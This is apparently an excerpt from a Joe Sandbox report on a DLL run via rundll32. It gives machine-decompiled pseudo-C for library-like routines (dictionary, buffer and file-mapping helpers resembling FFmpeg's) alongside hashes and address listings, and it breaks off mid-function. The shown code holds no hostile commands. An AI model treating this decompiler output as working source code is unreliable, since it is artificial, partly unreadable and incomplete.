                                                                      • Error occurred in fstat(): %s, xrefs: 1001950B
                                                                      • Cannot read file '%s': %s, xrefs: 100194A6
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: _closemv_log$ByteCharFileMultiWide_errnomv_callocmv_strerror$CloseCreateHandleMappingView_fstat64_get_osfhandle_wsopenmv_freepmvpriv_openwcslen
                                                                      • String ID: Cannot read file '%s': %s$Error occurred in CreateFileMapping()$Error occurred in fstat(): %s$File size for file '%s' is too big
                                                                      • API String ID: 2213036534-2445208470
                                                                      • Opcode ID: f3d6b5768689cfe5005ee31c4e5cc66ead5e4a9d6eb64f32d910fd6e1a6354d1
                                                                      • Instruction ID: a1ac4bca67f905ea7eb530c9fec20e9fe0d2cf07c5fae6ebec99be3d32fbbfc6
                                                                      • Opcode Fuzzy Hash: f3d6b5768689cfe5005ee31c4e5cc66ead5e4a9d6eb64f32d910fd6e1a6354d1
                                                                      • Instruction Fuzzy Hash: 8561BDB59097459FC310DF29C48429EBBE4FF88710F51892EE8D98B350EB78D9808F82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 20%
                                                                      			E10011210(intOrPtr __ebx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, signed int _a4, signed int _a8, void* _a12, signed int _a16) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				intOrPtr _v16;
                                                                      				void* _v32;
                                                                      				void* _v36;
                                                                      				int _v48;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				signed int _v72;
                                                                      				signed int _t94;
                                                                      				signed int* _t95;
                                                                      				signed int _t101;
                                                                      				signed int _t102;
                                                                      				signed int _t104;
                                                                      				signed int _t106;
                                                                      				int _t108;
                                                                      				int _t109;
                                                                      				int _t111;
                                                                      				signed int* _t118;
                                                                      				int _t122;
                                                                      				signed int _t123;
                                                                      				int _t126;
                                                                      				signed int _t127;
                                                                      				signed int* _t130;
                                                                      				int _t133;
                                                                      				signed int _t134;
                                                                      				void _t136;
                                                                      				signed int _t138;
                                                                      				void* _t142;
                                                                      				signed int _t146;
                                                                      				void* _t147;
                                                                      				signed int _t149;
                                                                      				signed int _t150;
                                                                      				int _t153;
                                                                      				void* _t154;
                                                                      				signed int* _t157;
                                                                      				signed int* _t158;
                                                                      
                                                                      				_v8 = __edi;
                                                                      				_v16 = __ebx;
                                                                      				_t138 = _a16;
                                                                      				_v12 = __esi;
                                                                      				_t146 = _a8;
                                                                      				_v4 = __ebp;
                                                                      				_t118 =  *_a4;
                                                                      				_v36 = 0;
                                                                      				_v32 = 0;
                                                                      				if((_t138 & 0x00000008) == 0) {
                                                                      					if(_a12 == 0) {
                                                                      						goto L2;
                                                                      					}
                                                                      					 *_t158 = _a12;
                                                                      					_v32 = E100292E0(_t118, _t138, _t146, __ebp);
                                                                      					if(_t146 != 0) {
                                                                      						goto L3;
                                                                      					}
                                                                      					goto L22;
                                                                      				} else {
                                                                      					_v32 = _a12;
                                                                      					L2:
                                                                      					if(_t146 == 0) {
                                                                      						L22:
                                                                      						_t147 = 0xffffffea;
                                                                      						L23:
                                                                      						if(_t118 == 0) {
                                                                      							L10:
                                                                      							 *_t158 = _v36;
                                                                      							L100290D0();
                                                                      							 *_t158 = _v32;
                                                                      							L100290D0();
                                                                      							L11:
                                                                      							return _t147;
                                                                      						}
                                                                      						L9:
                                                                      						if( *_t118 == 0) {
                                                                      							 *_t158 =  &(_t118[1]);
                                                                      							E100290E0();
                                                                      							 *_t158 = _a4;
                                                                      							E100290E0();
                                                                      						}
                                                                      						goto L10;
                                                                      					}
                                                                      					L3:
                                                                      					_t157 = 0;
                                                                      					if((_t138 & 0x00000040) == 0) {
                                                                      						_v64 = _t138;
                                                                      						_v68 = 0;
                                                                      						_v72 = _t146;
                                                                      						 *_t158 = _t118;
                                                                      						_t157 = E100110D0();
                                                                      					}
                                                                      					if((_t138 & 0x00000004) == 0) {
                                                                      						 *_t158 = _t146;
                                                                      						_t94 = E100292E0(_t118, _t138, _t146, _t157);
                                                                      						_v36 = _t94;
                                                                      						_t149 = _t94;
                                                                      						if(_t118 == 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						if(_t94 == 0) {
                                                                      							goto L8;
                                                                      						}
                                                                      						goto L6;
                                                                      					} else {
                                                                      						_v36 = _t146;
                                                                      						if(_t118 == 0) {
                                                                      							L29:
                                                                      							 *_t158 = 8;
                                                                      							_t95 = E10029100();
                                                                      							_t149 = _v36;
                                                                      							_t118 = _t95;
                                                                      							 *_a4 = _t118;
                                                                      							if(_t118 == 0 || _t149 == 0) {
                                                                      								_t147 = 0xfffffff4;
                                                                      								goto L23;
                                                                      							} else {
                                                                      								goto L6;
                                                                      							}
                                                                      						}
                                                                      						L6:
                                                                      						_t122 = _v32;
                                                                      						if(_a12 == 0 || _t122 != 0) {
                                                                      							if(_t157 == 0) {
                                                                      								_t150 =  *_t118;
                                                                      								if(_t122 == 0) {
                                                                      									L37:
                                                                      									if(_t150 == 0) {
                                                                      										 *_t158 =  &(_t118[1]);
                                                                      										E100290E0();
                                                                      										 *_t158 = _a4;
                                                                      										E100290E0();
                                                                      									}
                                                                      									_t147 = 0;
                                                                      									 *_t158 =  &_v36;
                                                                      									E100290E0();
                                                                      									goto L11;
                                                                      								}
                                                                      								_v68 = 8;
                                                                      								_v72 = _t150 + 1;
                                                                      								 *_t158 = _t118[1];
                                                                      								_t101 = E10029010();
                                                                      								_t123 = _t101;
                                                                      								if(_t101 == 0) {
                                                                      									goto L8;
                                                                      								}
                                                                      								_t118[1] = _t101;
                                                                      								_t150 =  *_t118;
                                                                      								L18:
                                                                      								_t102 = _v32;
                                                                      								if(_t102 == 0) {
                                                                      									goto L37;
                                                                      								}
                                                                      								_t130 = _t123 + _t150 * 8;
                                                                      								_t130[1] = _t102;
                                                                      								 *_t130 = _v36;
                                                                      								 *_t118 = _t150 + 1;
                                                                      								_t147 = 0;
                                                                      								goto L11;
                                                                      							}
                                                                      							if((_t138 & 0x00000010) != 0) {
                                                                      								 *_t158 = _t149;
                                                                      								_t147 = 0;
                                                                      								L100290D0();
                                                                      								 *_t158 = _v32;
                                                                      								L100290D0();
                                                                      								goto L11;
                                                                      							}
                                                                      							_t104 = _a4;
                                                                      							if(_t122 == 0 || (_t138 & 0x00000020) == 0) {
                                                                      								 *_t158 = _t104;
                                                                      								L100290D0();
                                                                      								goto L17;
                                                                      							} else {
                                                                      								 *_t158 = _t104;
                                                                      								_v48 = _t122;
                                                                      								_t108 = strlen(??);
                                                                      								 *_t158 = _v48;
                                                                      								_t153 = _t108;
                                                                      								_t109 = strlen(??);
                                                                      								 *_t158 = _t104;
                                                                      								_v48 = _t109;
                                                                      								_t63 = _t109 + 1; // 0x1
                                                                      								_v72 = _t153 + _t63;
                                                                      								_t111 = L10028DA0();
                                                                      								if(_t111 == 0) {
                                                                      									goto L8;
                                                                      								}
                                                                      								_t133 = _v48;
                                                                      								_t142 = _t111 + _t153;
                                                                      								_t154 = _v32;
                                                                      								_t126 = _t133 + 1;
                                                                      								if(_t126 >= 8) {
                                                                      									if((_t142 & 0x00000001) != 0) {
                                                                      										_t127 =  *_t154 & 0x000000ff;
                                                                      										_t142 = _t142 + 1;
                                                                      										_t154 = _t154 + 1;
                                                                      										 *(_t142 - 1) = _t127;
                                                                      										_t126 = _t133;
                                                                      									}
                                                                      									if((_t142 & 0x00000002) != 0) {
                                                                      										_t134 =  *_t154 & 0x0000ffff;
                                                                      										_t142 = _t142 + 2;
                                                                      										_t154 = _t154 + 2;
                                                                      										_t126 = _t126 - 2;
                                                                      										 *(_t142 - 2) = _t134;
                                                                      									}
                                                                      									if((_t142 & 0x00000004) != 0) {
                                                                      										_t136 =  *_t154;
                                                                      										_t142 = _t142 + 4;
                                                                      										_t154 = _t154 + 4;
                                                                      										_t126 = _t126 - 4;
                                                                      										 *(_t142 - 4) = _t136;
                                                                      									}
                                                                      								}
                                                                      								_v48 = _t111;
                                                                      								memcpy(_t142, _t154, _t126);
                                                                      								_t158 =  &(_t158[3]);
                                                                      								 *_t158 =  &_v32;
                                                                      								E100290E0();
                                                                      								_v32 = _v48;
                                                                      								L17:
                                                                      								 *_t158 =  *_t157;
                                                                      								L100290D0();
                                                                      								_t106 =  *_t118;
                                                                      								_t123 = _t118[1];
                                                                      								_t31 = _t106 - 1; // -1
                                                                      								_t150 = _t31;
                                                                      								 *_t118 = _t150;
                                                                      								 *_t157 =  *(_t123 + _t150 * 8);
                                                                      								_a4 =  *(_t123 + 4 + _t150 * 8);
                                                                      								goto L18;
                                                                      							}
                                                                      						} else {
                                                                      							L8:
                                                                      							_t147 = 0xfffffff4;
                                                                      							goto L9;
                                                                      						}
                                                                      					}
                                                                      				}
                                                                      			}

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_strdup$mv_dict_getmv_mallocz
                                                                      • String ID:
                                                                      • API String ID: 3834523185-0
                                                                      • Opcode ID: 92e61786e18b3758c0339e56a8e0c00a76c00a96181e52d74e44f6f1d6311550
                                                                      • Instruction ID: 56232f5dd71c1c11c53de360d97ca929451fd6b060f0d926ddb83f3af19d46ac
                                                                      • Opcode Fuzzy Hash: 92e61786e18b3758c0339e56a8e0c00a76c00a96181e52d74e44f6f1d6311550
                                                                      • Instruction Fuzzy Hash: 2E9127B5A087158FC754DF68C08065EBBE1EF98790F52892DED999B340E770E981CB82
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 35%
                                                                      			E1001A6C0(void* __eax, void* __ecx, void* __edx, void* __eflags) {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t251;
                                                                      				signed int _t259;
                                                                      				void* _t262;
                                                                      				signed int* _t263;
                                                                      				void* _t264;
                                                                      				void* _t269;
                                                                      				signed int _t275;
                                                                      				void* _t278;
                                                                      				signed int _t290;
                                                                      				signed int _t291;
                                                                      				void _t293;
                                                                      				void* _t294;
                                                                      				signed int _t307;
                                                                      				signed int _t308;
                                                                      				int _t311;
                                                                      				signed int _t315;
                                                                      				int _t321;
                                                                      				void* _t323;
                                                                      				int _t324;
                                                                      				void* _t327;
                                                                      				void* _t330;
                                                                      				void* _t332;
                                                                      				void* _t333;
                                                                      				signed int _t335;
                                                                      				void _t337;
                                                                      				void* _t338;
                                                                      				signed char* _t340;
                                                                      				void* _t341;
                                                                      				signed short* _t342;
                                                                      				void _t343;
                                                                      				signed int _t344;
                                                                      				void* _t345;
                                                                      				void* _t346;
                                                                      				void** _t347;
                                                                      
                                                                      				_t345 = __eax;
                                                                      				_t347 = _t346 - 0x4c;
                                                                      				_t347[8] = __ecx;
                                                                      				 *((intOrPtr*)(__eax + 0x54)) =  *((intOrPtr*)(__edx + 0x54));
                                                                      				 *((intOrPtr*)(__eax + 0x5c)) =  *((intOrPtr*)(__edx + 0x5c));
                                                                      				 *((intOrPtr*)(__eax + 0x60)) =  *((intOrPtr*)(__edx + 0x60));
                                                                      				 *((intOrPtr*)(__eax + 0x58)) =  *((intOrPtr*)(__edx + 0x58));
                                                                      				 *((intOrPtr*)(__eax + 0x130)) =  *((intOrPtr*)(__edx + 0x130));
                                                                      				 *((intOrPtr*)(__eax + 0x134)) =  *((intOrPtr*)(__edx + 0x134));
                                                                      				 *((intOrPtr*)(__eax + 0x138)) =  *((intOrPtr*)(__edx + 0x138));
                                                                      				 *((intOrPtr*)(__eax + 0x68)) =  *((intOrPtr*)(__edx + 0x68));
                                                                      				 *((intOrPtr*)(__eax + 0x6c)) =  *((intOrPtr*)(__edx + 0x6c));
                                                                      				 *((intOrPtr*)(__eax + 0x13c)) =  *((intOrPtr*)(__edx + 0x13c));
                                                                      				 *((intOrPtr*)(__eax + 0x160)) =  *((intOrPtr*)(__edx + 0x160));
                                                                      				 *((intOrPtr*)(__eax + 0x164)) =  *((intOrPtr*)(__edx + 0x164));
                                                                      				 *((intOrPtr*)(__eax + 0x90)) =  *((intOrPtr*)(__edx + 0x90));
                                                                      				 *((intOrPtr*)(__eax + 0x94)) =  *((intOrPtr*)(__edx + 0x94));
                                                                      				 *((intOrPtr*)(__eax + 0x98)) =  *((intOrPtr*)(__edx + 0x98));
                                                                      				 *((intOrPtr*)(__eax + 0x9c)) =  *((intOrPtr*)(__edx + 0x9c));
                                                                      				 *((intOrPtr*)(__eax + 0xa8)) =  *((intOrPtr*)(__edx + 0xa8));
                                                                      				 *((intOrPtr*)(__eax + 0x70)) =  *((intOrPtr*)(__edx + 0x70));
                                                                      				 *((intOrPtr*)(__eax + 0x74)) =  *((intOrPtr*)(__edx + 0x74));
                                                                      				 *((intOrPtr*)(__eax + 0x8c)) =  *((intOrPtr*)(__edx + 0x8c));
                                                                      				 *((intOrPtr*)(__eax + 0x108)) =  *((intOrPtr*)(__edx + 0x108));
                                                                      				 *((intOrPtr*)(__eax + 0x10c)) =  *((intOrPtr*)(__edx + 0x10c));
                                                                      				 *((intOrPtr*)(__eax + 0x124)) =  *((intOrPtr*)(__edx + 0x124));
                                                                      				 *((intOrPtr*)(__eax + 0x110)) =  *((intOrPtr*)(__edx + 0x110));
                                                                      				 *((intOrPtr*)(__eax + 0x114)) =  *((intOrPtr*)(__edx + 0x114));
                                                                      				 *((intOrPtr*)(__eax + 0x78)) =  *((intOrPtr*)(__edx + 0x78));
                                                                      				 *((intOrPtr*)(__eax + 0x7c)) =  *((intOrPtr*)(__edx + 0x7c));
                                                                      				 *((intOrPtr*)(__eax + 0xa0)) =  *((intOrPtr*)(__edx + 0xa0));
                                                                      				 *((intOrPtr*)(__eax + 0xa4)) =  *((intOrPtr*)(__edx + 0xa4));
                                                                      				_t347[6] = __edx;
                                                                      				_t304 =  *(__edx + 0x100);
                                                                      				_t289 =  *(__edx + 0x104);
                                                                      				 *((intOrPtr*)(__eax + 0x88)) =  *((intOrPtr*)(__edx + 0x88));
                                                                      				 *(__eax + 0x100) =  *(__edx + 0x100);
                                                                      				 *(__eax + 0x104) =  *(__edx + 0x104);
                                                                      				 *((intOrPtr*)(__eax + 0x80)) =  *((intOrPtr*)(__edx + 0x80));
                                                                      				 *((intOrPtr*)(__eax + 0x84)) =  *((intOrPtr*)(__edx + 0x84));
                                                                      				 *((intOrPtr*)(__eax + 0xe8)) =  *((intOrPtr*)(__edx + 0xe8));
                                                                      				 *((intOrPtr*)(__eax + 0x11c)) =  *((intOrPtr*)(__edx + 0x11c));
                                                                      				 *((intOrPtr*)(__eax + 0xf0)) =  *((intOrPtr*)(__edx + 0xf0));
                                                                      				 *((intOrPtr*)(__eax + 0xf4)) =  *((intOrPtr*)(__edx + 0xf4));
                                                                      				 *((intOrPtr*)(__eax + 0xf8)) =  *((intOrPtr*)(__edx + 0xf8));
                                                                      				 *((intOrPtr*)(__eax + 0xec)) =  *((intOrPtr*)(__edx + 0xec));
                                                                      				 *((intOrPtr*)(__eax + 0xfc)) =  *((intOrPtr*)(__edx + 0xfc));
                                                                      				_t347[2] = 0;
                                                                      				_t347[1] =  *(__edx + 0x118);
                                                                      				 *_t347 = __eax + 0x118;
                                                                      				L10011D20();
                                                                      				_t321 = _t347[6];
                                                                      				if( *((intOrPtr*)(_t321 + 0xe4)) <= 0) {
                                                                      					L31:
                                                                      					_t347[6] = _t321;
                                                                      					_t347[1] =  *(_t321 + 0x12c);
                                                                      					 *_t347 = _t345 + 0x12c;
                                                                      					_t290 = E1000A480(_t289, _t326, _t334, _t345);
                                                                      					_t347[1] =  *(_t347[6] + 0x140);
                                                                      					 *_t347 = _t345 + 0x140;
                                                                      					return E1000A480(_t290, _t326, _t334, _t345) | _t290;
                                                                      				} else {
                                                                      					_t347[6] = 0;
                                                                      					do {
                                                                      						_t334 = _t347[6];
                                                                      						_t289 =  *( *((intOrPtr*)(_t321 + 0xe0)) + _t347[6] * 4);
                                                                      						_t326 =  *_t289;
                                                                      						if(_t326 != 0 ||  *((intOrPtr*)(_t321 + 0x44)) ==  *((intOrPtr*)(_t345 + 0x44)) &&  *((intOrPtr*)(_t321 + 0x48)) ==  *((intOrPtr*)(_t345 + 0x48))) {
                                                                      							if(_t347[8] != 0) {
                                                                      								_t347[0xa] = _t321;
                                                                      								 *_t347 =  *(_t289 + 8);
                                                                      								_t251 = L10009DC0(_t289, _t304, _t326, _t334);
                                                                      								_t347[0xf] = _t251;
                                                                      								_t335 = _t251;
                                                                      								if(_t251 == 0) {
                                                                      									L19:
                                                                      									 *_t347 =  &(_t347[0xf]);
                                                                      									E1000A000(_t289, _t335);
                                                                      									if( *(_t345 + 0xe4) > 0) {
                                                                      										_t291 = 0;
                                                                      										do {
                                                                      											_t327 =  *(_t345 + 0xe0) + _t291 * 4;
                                                                      											_t291 = _t291 + 1;
                                                                      											_t337 =  *_t327;
                                                                      											_t338 = _t337 + 0xc;
                                                                      											 *_t347 = _t337 + 0x10;
                                                                      											E1000A000(_t291, _t338);
                                                                      											 *_t347 = _t338;
                                                                      											L10011CC0();
                                                                      											 *_t347 = _t327;
                                                                      											E100290E0();
                                                                      										} while (_t291 <  *(_t345 + 0xe4));
                                                                      									}
                                                                      									goto L22;
                                                                      								} else {
                                                                      									_t259 =  *(_t345 + 0xe4);
                                                                      									if(_t259 > 0x1ffffffe) {
                                                                      										goto L19;
                                                                      									} else {
                                                                      										_t347[1] = 4 + _t259 * 4;
                                                                      										 *_t347 =  *(_t345 + 0xe0);
                                                                      										_t262 = L10028DA0();
                                                                      										if(_t262 == 0) {
                                                                      											goto L19;
                                                                      										} else {
                                                                      											 *(_t345 + 0xe0) = _t262;
                                                                      											 *_t347 = 0x14;
                                                                      											_t263 = E10029100();
                                                                      											if(_t263 == 0) {
                                                                      												goto L19;
                                                                      											} else {
                                                                      												_t263[4] = _t335;
                                                                      												_t323 =  *(_t335 + 4);
                                                                      												 *_t263 = _t326;
                                                                      												_t263[2] =  *(_t335 + 8);
                                                                      												_t307 =  *(_t345 + 0xe4);
                                                                      												_t263[1] = _t323;
                                                                      												_t347[0xb] = _t323;
                                                                      												 *(_t345 + 0xe4) = _t307 + 1;
                                                                      												 *( *(_t345 + 0xe0) + _t307 * 4) = _t263;
                                                                      												_t340 =  *(_t289 + 4);
                                                                      												_t347[7] =  *(_t289 + 8);
                                                                      												_t330 = _t323;
                                                                      												_t324 = _t347[0xa];
                                                                      												_t347[9] = _t340;
                                                                      												if(_t347[7] >= 8) {
                                                                      													if((_t330 & 0x00000001) != 0) {
                                                                      														_t308 =  *_t340 & 0x000000ff;
                                                                      														_t330 = _t330 + 1;
                                                                      														_t347[0xa] = _t308;
                                                                      														 *(_t330 - 1) = _t308;
                                                                      														_t347[7] = _t347[7] - 1;
                                                                      														_t347[9] = _t347[9] + 1;
                                                                      														if((_t330 & 0x00000002) != 0) {
                                                                      															goto L34;
                                                                      														}
                                                                      													} else {
                                                                      														if((_t330 & 0x00000002) != 0) {
                                                                      															L34:
                                                                      															_t342 = _t347[9];
                                                                      															_t330 = _t330 + 2;
                                                                      															 *((short*)(_t330 - 2)) =  *_t342 & 0x0000ffff;
                                                                      															_t347[7] = _t347[7] - 2;
                                                                      															_t347[9] =  &(_t342[1]);
                                                                      														}
                                                                      													}
                                                                      													if((_t330 & 0x00000004) != 0) {
                                                                      														_t341 = _t347[9];
                                                                      														_t330 = _t330 + 4;
                                                                      														 *(_t330 - 4) =  *_t341;
                                                                      														_t347[7] = _t347[7] - 4;
                                                                      														_t347[9] = _t341 + 4;
                                                                      													}
                                                                      												}
                                                                      												_t334 = _t347[9];
                                                                      												_t311 = _t347[7];
                                                                      												_t264 = memcpy(_t330, _t334, _t311);
                                                                      												_t347 =  &(_t347[3]);
                                                                      												_t326 = _t334 + _t311 + _t311;
                                                                      												goto L8;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							} else {
                                                                      								_t347[7] = _t321;
                                                                      								 *_t347 =  *(_t289 + 0x10);
                                                                      								_t269 = L10009FC0(_t289, _t304);
                                                                      								_t343 =  *_t289;
                                                                      								_t347[0xf] = _t269;
                                                                      								_t332 = _t269;
                                                                      								if(_t269 == 0) {
                                                                      									L23:
                                                                      									 *_t347 =  &(_t347[0xf]);
                                                                      									E1000A000(_t289, _t343);
                                                                      									if( *(_t345 + 0xe4) > 0) {
                                                                      										_t344 = _t347[8];
                                                                      										do {
                                                                      											_t333 =  *(_t345 + 0xe0) + _t344 * 4;
                                                                      											_t344 = _t344 + 1;
                                                                      											_t293 =  *_t333;
                                                                      											_t294 = _t293 + 0xc;
                                                                      											 *_t347 = _t293 + 0x10;
                                                                      											E1000A000(_t294, _t344);
                                                                      											 *_t347 = _t294;
                                                                      											L10011CC0();
                                                                      											 *_t347 = _t333;
                                                                      											E100290E0();
                                                                      										} while (_t344 <  *(_t345 + 0xe4));
                                                                      									}
                                                                      									L22:
                                                                      									 *(_t345 + 0xe4) = 0;
                                                                      									 *_t347 = _t345 + 0xe0;
                                                                      									E100290E0();
                                                                      									return 0xfffffff4;
                                                                      								} else {
                                                                      									_t275 =  *(_t345 + 0xe4);
                                                                      									if(_t275 > 0x1ffffffe) {
                                                                      										goto L23;
                                                                      									} else {
                                                                      										_t347[1] = 4 + _t275 * 4;
                                                                      										 *_t347 =  *(_t345 + 0xe0);
                                                                      										_t278 = L10028DA0();
                                                                      										if(_t278 == 0) {
                                                                      											goto L23;
                                                                      										} else {
                                                                      											 *(_t345 + 0xe0) = _t278;
                                                                      											 *_t347 = 0x14;
                                                                      											_t264 = E10029100();
                                                                      											if(_t264 == 0) {
                                                                      												goto L23;
                                                                      											} else {
                                                                      												 *(_t264 + 0x10) = _t332;
                                                                      												_t324 = _t347[7];
                                                                      												 *((intOrPtr*)(_t264 + 4)) =  *((intOrPtr*)(_t332 + 4));
                                                                      												 *_t264 = _t343;
                                                                      												_t334 =  *(_t345 + 0xe0);
                                                                      												 *((intOrPtr*)(_t264 + 8)) =  *((intOrPtr*)(_t332 + 8));
                                                                      												_t315 =  *(_t345 + 0xe4);
                                                                      												_t326 = _t315 + 1;
                                                                      												 *(_t345 + 0xe4) = _t315 + 1;
                                                                      												 *( *(_t345 + 0xe0) + _t315 * 4) = _t264;
                                                                      												L8:
                                                                      												_t347[7] = _t324;
                                                                      												_t347[2] = 0;
                                                                      												_t304 =  *(_t289 + 0xc);
                                                                      												 *_t347 = _t264 + 0xc;
                                                                      												_t347[1] =  *(_t289 + 0xc);
                                                                      												L10011D20();
                                                                      												_t321 = _t347[7];
                                                                      												goto L9;
                                                                      											}
                                                                      										}
                                                                      									}
                                                                      								}
                                                                      							}
                                                                      						} else {
                                                                      							goto L9;
                                                                      						}
                                                                      						goto L35;
                                                                      						L9:
                                                                      						_t347[6] = _t347[6] + 1;
                                                                      					} while ( *((intOrPtr*)(_t321 + 0xe4)) > _t347[6]);
                                                                      					goto L31;
                                                                      				}
                                                                      				L35:
                                                                      			}









































                                                                      0x1001ab68
                                                                      0x1001ab6d
                                                                      0x1001ab73
                                                                      0x1001ab78
                                                                      0x1001ab78
                                                                      0x1001ab5e
                                                                      0x1001a975
                                                                      0x1001a979
                                                                      0x1001a97d
                                                                      0x1001a97d
                                                                      0x1001a97d
                                                                      0x00000000
                                                                      0x1001a97d
                                                                      0x1001a923
                                                                      0x1001a909
                                                                      0x1001a8e8
                                                                      0x1001a9e2
                                                                      0x1001a9e2
                                                                      0x1001a9e9
                                                                      0x1001a9ec
                                                                      0x1001a9f1
                                                                      0x1001a9f3
                                                                      0x1001a9f9
                                                                      0x1001a9fb
                                                                      0x1001aaf0
                                                                      0x1001aaf4
                                                                      0x1001aaf7
                                                                      0x1001ab04
                                                                      0x1001ab06
                                                                      0x1001ab0a
                                                                      0x1001ab10
                                                                      0x1001ab13
                                                                      0x1001ab14
                                                                      0x1001ab19
                                                                      0x1001ab1c
                                                                      0x1001ab1f
                                                                      0x1001ab24
                                                                      0x1001ab27
                                                                      0x1001ab2c
                                                                      0x1001ab2f
                                                                      0x1001ab34
                                                                      0x1001ab3c
                                                                      0x1001aaca
                                                                      0x1001aad2
                                                                      0x1001aad8
                                                                      0x1001aadb
                                                                      0x1001aaec
                                                                      0x1001aa01
                                                                      0x1001aa01
                                                                      0x1001aa0c
                                                                      0x00000000
                                                                      0x1001aa12
                                                                      0x1001aa19
                                                                      0x1001aa23
                                                                      0x1001aa26
                                                                      0x1001aa2d
                                                                      0x00000000
                                                                      0x1001aa33
                                                                      0x1001aa33
                                                                      0x1001aa39
                                                                      0x1001aa40
                                                                      0x1001aa47
                                                                      0x00000000
                                                                      0x1001aa4d
                                                                      0x1001aa4d
                                                                      0x1001aa53
                                                                      0x1001aa57
                                                                      0x1001aa5d
                                                                      0x1001aa5f
                                                                      0x1001aa65
                                                                      0x1001aa68
                                                                      0x1001aa6e
                                                                      0x1001aa71
                                                                      0x1001aa77
                                                                      0x1001a97f
                                                                      0x1001a97f
                                                                      0x1001a988
                                                                      0x1001a98c
                                                                      0x1001a98f
                                                                      0x1001a992
                                                                      0x1001a996
                                                                      0x1001a99b
                                                                      0x00000000
                                                                      0x1001a99b
                                                                      0x1001aa47
                                                                      0x1001aa2d
                                                                      0x1001aa0c
                                                                      0x1001a9fb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x1001a99f
                                                                      0x1001a99f
                                                                      0x1001a9a7
                                                                      0x00000000
                                                                      0x1001a9b3
                                                                      0x00000000

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
                                                                      • Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                      Similarity
                                                                      • API ID: mv_buffer_replacemv_dict_copy$mv_buffer_refmv_malloczmv_realloc
                                                                      • String ID:
                                                                      • API String ID: 1780483662-0
                                                                      • Opcode ID: 3861e8adcd179e933f9009bb7fa2dda5d09e50d5a5c7a36caa6a21cb84e0f4c5
                                                                      • Instruction ID: 4f31049026451c5eff94bb509f486bba90e5ec7b997a8c78013bd9afd2acced3
                                                                      • Opcode Fuzzy Hash: 3861e8adcd179e933f9009bb7fa2dda5d09e50d5a5c7a36caa6a21cb84e0f4c5
                                                                      • Instruction Fuzzy Hash: 3EF1C3B49043468FCB64CF29C5807D9BBE1FF49350F458A6EE9899B312D730A984CF91
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 44%
                                                                      			E10026250() {
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				void* __esi;
                                                                      				void* __ebp;
                                                                      				signed int _t100;
                                                                      				signed int _t104;
